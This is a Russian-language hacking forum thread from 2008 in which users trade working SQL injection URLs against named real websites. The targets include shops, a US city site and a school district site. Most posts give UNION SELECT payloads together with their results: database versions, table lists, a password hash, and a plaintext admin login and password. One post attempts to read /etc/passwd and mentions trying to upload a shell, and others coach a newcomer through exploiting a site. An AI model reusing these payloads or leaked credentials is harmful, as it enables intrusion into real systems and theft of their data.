14.02.2008, 15:36
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
2 Digital Cat
Не плачь =)
Код HTML:
http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+concat_ws(0x3a,version(),user(),database())/*
5.0.22:haute_shop@localhost:haute_shop
Последний раз редактировалось ~EviL~; 14.02.2008 в 15:39..
|
|
|
14.02.2008, 15:52
|
|
Участник форума
Регистрация: 04.02.2008
Сообщений: 116
С нами:
9613296
Репутация:
237
|
|
О_о 1? И это все?)) Нда... Несерьезно))
Спасибо!
 |
|
|
|
14.02.2008, 16:48
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами:
10305026
Репутация:
187
|
|
Сообщение от Digital Cat
О_о 1? И это все?)) Нда... Несерьезно))
Спасибо!
http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+concat(password,char(58),login,cha r(58),id)+from+users/*
fe83361168623c81f8a8f11a8270ef7b:Liliya1976:2
http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+concat_ws(0x3A,table_schema,TABLE_ NAME)+FROM+INFORMATION_SCHEMA.TABLES+limit%2028,13/*
Таблы
CHARAKTER SETS, collations, COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS about basket catalog delivery finance news orders pages params payment structure typegoods users
http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+column_name+from+information_schem a.columns%20limit%204,1/*
колонки
CHARACTER_SET_NAME DEFAULT_COLLATE_NAME DESCRIPTION MAXLEN COLLATION_NAME
NO COMENTS IN MY POST
Последний раз редактировалось kair; 14.02.2008 в 16:51..
|
|
|
|
14.02.2008, 17:03
|
|
Новичок
Регистрация: 23.01.2008
Сообщений: 15
С нами:
9630912
Репутация:
63
|
|
http://www.superherohype.com/news/300news.php?id=-4610+union+select+concat_ws(0x3a,version(),user(), database())/*
Смотрим в заголовок, где и выводится инфа  ЫЫЫЫЫ 
Суперхер... |
|
|
|
14.02.2008, 17:25
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
Скуль я выкладывал раньше, потом я ее удалил...и естественно я не смотрел на предыдущую страничку.. Чуваку нашедшему и раскрывшему до конца скуль респект и уважуха! в отличе от меня ему было не лень найти логины и пасы на админку
Последний раз редактировалось xcedz; 14.02.2008 в 17:28..
|
|
|
|
14.02.2008, 18:05
|
|
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
С нами:
9969506
Репутация:
252
|
|
Код:
http://www.doktor-al.ru/get_news.php?news_id=99999+union+select+1,2,3,4,5,6,7/*
doctor_al_ru@localhost:doctor_al_ru:5.0.24a
Код:
http://www.daoctemplates.net/viewUser.php?UserID=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,concat_ws(0x3a,username,password,email),29,30,31,32,33+from+users/*
daoctemplates@localhost:daoctemplates:4.1.20 |
|
|
|
15.02.2008, 13:28
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 13
С нами:
9599075
Репутация:
5
|
|
Я нашел скуль:
http://event.zontik.ru/?cat=30'
Пробовал раскрыть его, но ничего не получается=((
Помогите пожалуйста раскрыть скуль.
|
|
|
|
15.02.2008, 13:40
|
|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
С нами:
10333826
Репутация:
369
|
|
Сообщение от QZAR-X
Я нашел скуль:
http://event.zontik.ru/?cat=30'
Пробовал раскрыть его, но ничего не получается=((
Помогите пожалуйста раскрыть скуль.
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+concat_ws(0x2F,version(),database(),user())/*
5.0.41-log/zontikweb/zontik_grab@localhost
а дальше сам попробуй если не получиться помогу
стало самому интересно
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES/*
вот какие таблицы нашел :
PHP код:
COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE
PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS
USER_PRIVILEGES,VIEWS,del_status,dns_a,dns_cname,dns_dep,dns_isp_dns,dns_mx,dns_nodes,dns_secondary,dns_spf,doctype,groups
help_documents,help_nodes,help_tickets,isp_com,isp_dep,isp_dienste,isp_fakt_artikel,isp_fakt_dep,isp_fakt_nodes,isp_fakt_rechnung
isp_fakt_record,isp_firewall,isp_htaccess,isp_isp_actions,isp_isp_admin,isp_isp_datenbank
LOAD_FILE:
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+LOAD_FILE('/etc/passwd')/*
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+user+from+mysql.user/*
user: whole
пароль не смог узнать (((
и шелл не получаеться залить
еси кто осилит сообщите мне плизз 
Последний раз редактировалось satana8920; 16.02.2008 в 00:44..
|
|
|
|
15.02.2008, 15:31
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами:
9633635
Репутация:
338
|
|
Код:
http://www.newkurkino.ru/modules.php?op=modload&name=News&file=article&sid=0x3127%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
4.0.26-log/udb223/Uwww223S@localhost |
|
|
|
15.02.2008, 15:49
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
С нами:
10002038
Репутация:
100
|
|
www.ci.petoskey.mi.us
Код:
http://www.ci.petoskey.mi.us/gallery2.php?gallery_id=-5+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5/*
5.0.27-log:cityofpetoskey@localhost:cityofpetoskey
Код:
http://www.ci.petoskey.mi.us/gallery2.php?gallery_id=-5+union+select+1,concat_ws(0x3a,id,username,password),3,4,5+from+mgr_users+limit+0,1/*
1:admin:employee104
www.warwick.k12.pa.us
Код:
http://www.warwick.k12.pa.us/news.php?id=-3+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9/*
4.0.24:root@localhost:basmati
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
